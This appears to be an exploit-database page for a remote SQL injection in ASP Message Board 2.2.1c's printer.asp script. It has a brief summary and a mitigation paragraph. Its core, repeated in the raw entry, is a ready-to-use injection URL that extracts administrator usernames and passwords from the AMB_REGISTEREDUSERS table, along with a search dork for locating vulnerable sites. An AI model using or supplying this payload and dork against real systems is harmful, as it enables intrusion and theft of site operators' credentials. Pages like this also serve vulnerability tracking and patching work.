header-logo
Suggest Exploit
vendor:
ASP Message Board
by:
Q7x
7.5
CVSS
HIGH
Remote SQL Injection
CWE
Product Name: ASP Message Board
Affected Version From: 2.2.1c
Affected Version To: 2.2.1c
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ASP Message Board Remote SQL Injection Exploit

This exploit allows an attacker to retrieve the admin user, password, and username from an ASP Message Board version 2.2.1c by exploiting a remote SQL injection vulnerability in the printer.asp script. The exploit URL is http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS)).

Mitigation:

To mitigate this vulnerability, it is recommended to update the ASP Message Board to a newer version that addresses the remote SQL injection issue. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

* Bug Found On : "ASP Message Board"
*
* Found By : Q7x
* 
* Home : Www.Larestankids.coM ( Ashiyane2 Security Team )
*
* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))

# milw0rm.com [2007-11-05]

Navigation

Suggest Exploit

Services By CQR